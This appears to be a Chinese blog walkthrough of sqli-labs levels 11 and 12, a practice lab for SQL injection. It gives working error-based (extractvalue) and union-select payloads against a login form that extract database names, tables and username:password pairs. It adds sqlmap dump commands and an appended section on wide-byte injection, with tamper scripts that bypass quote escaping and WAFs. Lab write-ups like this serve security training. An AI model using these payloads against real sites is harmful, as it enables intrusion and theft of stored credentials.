2020.4.3 sqli-labs--第十一、十二关①

本文介绍了在sqli-labs的第十一、十二关中,如何利用extractvalue和联合查询(union select)进行SQL注入攻击。首先,通过BP抓包并修改POST参数,尝试extractvalue方法进行报错型注入,逐步揭示数据库名、表名、字段名及字段值。其次,使用联合查询构造payload,以显示隐藏内容。最后,推荐使用sqlmap自动化工具,快速完成数据库信息的爆破。第十二关虽然闭合方式有所不同,但整体思路与第十一关相似。

在这里插入图片描述对于post传参的我们最好用bp

输入admin admin 登陆,抓包,发送到repeater模块
在这里插入图片描述在repeater中通过修改post的参数进行注入。

方法一 extractvalue测试payload

uname=admin' and 1=1 --+ &passwd=admin&submit=Submit //能登陆
uname=admin' and 1=2 --+ &passwd=admin&submit=Submit //不能登陆

在这里插入图片描述说明注入生效,存在报错型注入,接下来又是重复性工作,上extractvalue()

爆数据库名:

uname=admin' and extractvalue(1,concat(0x7e,(select database()))) --+&passwd=admin&submit=Submit

爆表名:

uname=admin' and extractvalue(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=database()))) --+&passwd=admin&submit=Submit

只能查询到前几个表,后面加上not in ()就可以查到其他表了,如:

uname=admin' and extractvalue(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=database() and table_name not in ('emails')))) --+&passwd=admin&submit=Submit

爆字段名:

uname=admin' and extractvalue(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_name='users'))) --+&passwd=admin&submit=Submit

爆字段值:

uname=admin' and extractvalue(1,concat(0x7e,(select group_concat(username,0x3a,password) from users)))--+&passwd=admin&submit=Submit

同样使用not in 可以查询其他值:

uname=admin' and extractvalue(1,concat(0x7e,(select group_concat(username,0x3a,password) from users where username not in ('Dumb','I-kill-you'))))--+&passwd=admin&submit=Submit

在这里插入图片描述

方法二 联合查询union select测试payload

注意uname是错误的,才能显示联合查询内容。

前面构造闭合,中间sql语句,后面注释
在这里插入图片描述在这里插入图片描述爆当前数据库中的表名:

uname=0' union select 1,group_concat(table_name) from information_schema.tables where table_schema=database() --+&passwd=admin&submit=Submit

字段名:表名要加单引号

uname=0' union select 1,group_concat(column_name) from information_schema.columns where table_name='users' --+&passwd=admin&submit=Submit

字段值:

uname=0' union select 1,group_concat(username,0x3e,password) from users --+&passwd=admin&submit=Submit

第三种方法:sqlmap(强烈推荐)

1.爆数据库名

python sqlmap.py -r source.txt  -p passwd --technique E --dbs --batch

在这里插入图片描述
2.爆表名

python sqlmap.py -r source.txt  -p passwd --technique E -D security --tables --batch

在这里插入图片描述
3.爆字段名

python sqlmap.py -r source.txt  -p passwd --technique E -D security -T users --columns --batch

在这里插入图片描述
4.爆字段值

python sqlmap.py -r source.txt  -p passwd --technique E -D security -T users -C "username,password" --dump --batch

在这里插入图片描述

第十二关

通过源码发现他闭合需要双引号和括号。除了闭合方式有点区别,其他的大致和11题一样。
在这里插入图片描述例如:这里爆其库名:

uname=admin") and extractvalue(1,concat(0x7e,(select database())))  and " &passwd=admin&submit=Submit
### 如何使用 SQLMap 结合 `unmagicquotes` tamper 脚本进行宽字节 SQL 注入攻击并提取当前数据库名称 以下内容详细说明如何利用 SQLMap 对目标 URL 进行宽字节 SQL 注入测试,并结合 `unmagicquotes` tamper 脚本来绕过 `magic_quotes_gpc` 防护,最终提取当前数据库名称。 #### 代码示例 以下是完整的命令行代码示例: ```bash sqlmap -u "http://192.168.3.191/sqli-labs-master/Less-32/?id=1" --prefix="%df'" --suffix=" " --tamper="unmagicquotes" --dbms=mysql --level=5 --risk=3 --current-db --batch ``` - `-u`:指定目标 URL。 - `--prefix="%df'"`:设置注入点前缀为 `%df'`,用于模拟宽字节注入场景[^2]。 - `--suffix=" "`:设置注入点后缀为空格,确保 SQL 语句正确闭合。 - `--tamper="unmagicquotes"`:加载 `unmagicquotes` tamper 脚本,专门用于绕过 `magic_quotes_gpc` 防护机制[^2]。 - `--dbms=mysql`:指定目标数据库类型为 MySQL。 - `--level=5` 和 `--risk=3`:提高检测级别和风险等级,确保能够发现潜在漏洞。 - `--current-db`:提取当前数据库名称。 - `--batch`:自动选择默认选项,避免交互式输入。 #### 参数解析 - 宽字节注入的核心在于通过 `%df'` 绕过单引号过滤,这在 GBK 字符集下尤为有效。 - `unmagicquotes` tamper 脚本通过对特殊字符进行编码转换,帮助绕过 `magic_quotes_gpc` 防护机制。 - 提取当前数据库名称的功能由 `--current-db` 参数实现,该参数会自动构造相 SQL 查询以获取数据库名称。 #### 注意事项 - 如果目标环境启用了 WAF 或其他防护机制,可以尝试加载更多 tamper 脚本以增强绕过能力。例如: ```bash sqlmap -u "http://192.168.3.191/sqli-labs-master/Less-32/?id=1" --prefix="%df'" --suffix=" " --tamper="unmagicquotes,randomcomments" --dbms=mysql --level=5 --risk=3 --current-db --batch ``` - `randomcomments` tamper 脚本会在 SQL 键字之间插入随机注释符号(如 `/**/`),进步混淆注入流量[^2]。 - 在某些情况下,可能需要手动调整注入点或使用 `--data` 参数指定 POST 请求数据。例如: ```bash sqlmap -u "http://192.168.3.191/sqli-labs-master/Less-32/" --data="id=1" --prefix="%df'" --suffix=" " --tamper="unmagicquotes" --dbms=mysql --level=5 --risk=3 --current-db --batch ``` #### 测试结果验证 运行上述命令后,SQLMap 将自动检测是否存在宽字节注入漏洞,并尝试提取当前数据库名称。如果成功检测到漏洞并提取到数据库名称,可以在后续操作中使用 `--dbs`、`--tables`、`--columns` 和 `--dump` 等参数进步枚举数据库结构和敏感数据。 ---
评论
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值